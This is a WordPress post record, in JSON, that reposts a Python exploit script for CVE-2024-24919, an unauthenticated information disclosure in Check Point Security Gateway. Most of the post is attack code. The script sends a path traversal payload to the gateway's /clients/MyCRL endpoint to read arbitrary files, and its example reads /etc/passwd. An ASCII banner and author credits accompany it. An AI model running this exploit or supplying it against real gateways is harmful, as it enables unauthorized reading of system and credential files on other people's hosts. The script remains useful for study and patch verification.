{"id":57210,"date":"2024-05-31T21:50:36","date_gmt":"2024-05-31T17:50:36","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178872\/cpsg-disclose.txt"},"modified":"2024-05-31T21:50:36","modified_gmt":"2024-05-31T17:50:36","slug":"check-point-security-gateway-information-disclosure","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/check-point-security-gateway-information-disclosure\/","title":{"rendered":"Check Point Security Gateway Information Disclosure"},"content":{"rendered":"<pre readability=\"18\"><code readability=\"30\"># Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated)<br># Exploit Author: Yesith Alvarez<br># Vendor Homepage: https:\/\/support.checkpoint.com\/results\/sk\/sk182336<br># Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 <br># CVE : CVE-2024-24919<p>from requests import Request, Session<br>import sys<br>import json<\/p><p>def title():<br>print('''<\/p><p>_______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___ <br>\/ ____\\ \\ \/ \/ ____| |__ \\ \/ _ \\__ \\| || | |__ \\| || | \/ _ \\\/_ |\/ _ \\ <br>| | \\ \\ \/ \/| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |<br>| | \\ \\\/ \/ | __|______\/ \/| | | |\/ \/|__ _|______\/ \/|__ _\\__, || |\\__, |<br>| |____ \\ \/ | |____ \/ \/_| |_| \/ \/_ | | \/ \/_ | | \/ \/ | | \/ \/ <br>\\_____| \\\/ |______| |____|\\___\/____| |_| |____| |_| \/_\/ |_| \/_\/ <\/p><p>Author: Yesith Alvarez<br>Github: https:\/\/github.com\/yealvarez<br>Linkedin: https:\/\/www.linkedin.com\/in\/pentester-ethicalhacker\/<br>''') <\/p><p>def exploit(url, path):<br>url = url + '\/clients\/MyCRL'<br>data = \"aCSHELL\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\"+ path<br>headers = { <br>'Connection': 'keep-alive',<br>'User-Agent': 'Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko\/20100101 Firefox\/123.0'<br>}<br>s = Session()<br>req = Request('POST', url, data=data, headers=headers)<br>prepped = req.prepare()<br>#del prepped.headers['Content-Type']resp = s.send(prepped,<br>verify=False,<br>timeout=15<br>) <br>print(prepped.headers)<br>print(url)<br>print(resp.headers)<br>print(resp.status_code)<\/p><p>if __name__ == '__main__':<br>title()<br>if(len(sys.argv) &lt; 3):<br>print('[+] USAGE: python3 %s https:\/\/&lt;target_url&gt; path\\n'%(sys.argv[0]))<br>print('[+] EXAMPLE: python3 %s https:\/\/192.168.0.10 \"\/etc\/passwd\"\\n'%(sys.argv[0])) <br>exit(0)<br>else:<br>exploit(sys.argv[1],sys.argv[2])<\/p><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Check Point Security Gateway &#8211; Information Disclosure (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https:\/\/support.checkpoint.com\/results\/sk\/sk182336# Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 # CVE : CVE-2024-24919from requests import Request, Sessionimport sysimport jsondef title():print(&#8221;&#8217;_______ ________ ___ ___ ___ &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57210","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57210","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57210"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57210\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57210"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57210"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57210"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}